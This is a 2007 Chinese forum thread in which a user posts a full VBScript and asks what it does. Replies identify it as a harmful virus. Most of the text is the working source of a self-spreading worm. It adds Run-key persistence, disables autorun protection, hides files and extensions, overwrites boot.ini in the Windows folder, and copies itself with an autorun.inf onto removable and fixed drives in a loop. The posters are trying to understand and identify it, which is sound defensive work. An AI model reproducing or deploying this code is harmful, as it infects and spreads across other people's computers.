|
dos9527
中级用户
积分 252
发帖 56
注册 2003-12-29
状态 离线
|
『楼 主』:
同志们进来看下这个VBS有什么作用
'marker
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
set rg = createobject("WScript.Shell")
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 39
if cc = "'mark" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
if cc = "'marker" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm="'mark"
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
if(flashdrive.drivetype=2) then
hm = "'marker"
end if
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
next
if cc <> "'mark" then
Wscript.sleep 10000
end if
loop while cc <> "'mark"
还有为什么文件全名用”.MS32DLL.dll.vbs“,是前面那个点有什么作用。
[ Last edited by dos9527 on 2007-11-21 at 04:02 PM ]
|
|
 2007-11-21 15:47 |
|
|
dos9527
中级用户
积分 252
发帖 56
注册 2003-12-29
状态 离线
|
|
|
2007-11-21 16:17 |
|
|
scriptor
银牌会员
积分 1187
发帖 555
注册 2006-12-21
状态 离线
|
『第
3 楼』:
| Quote: | Originally posted by dos9527 at 2007-11-21 15:47:
'marker
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DL ... |
|
我 ft~~~
明显一个有害的脚本~~
1: 添加自启动
2: 隐藏文件类型
3: 无法显示隐藏等属性的文件
4: 控制磁盘使其能自运行
5: 改写boot.ini
6: vbs进程还不能杀掉
...
|
|
|
2007-11-21 18:02 |
|
|
dos9527
中级用户
积分 252
发帖 56
注册 2003-12-29
状态 离线
|
『第
4 楼』:
有没有盗号的可能,我是玩网游的,我怕被盗号
|
|
|
2007-11-21 20:59 |
|
|
hlowd
初级用户
积分 65
发帖 29
注册 2007-11-3
状态 离线
|
『第
5 楼』:
应该病毒的其中一部分,没看见盗号的代码,但是有这东西总是不爽.....
|
|
|
2007-11-21 21:28 |
|
|
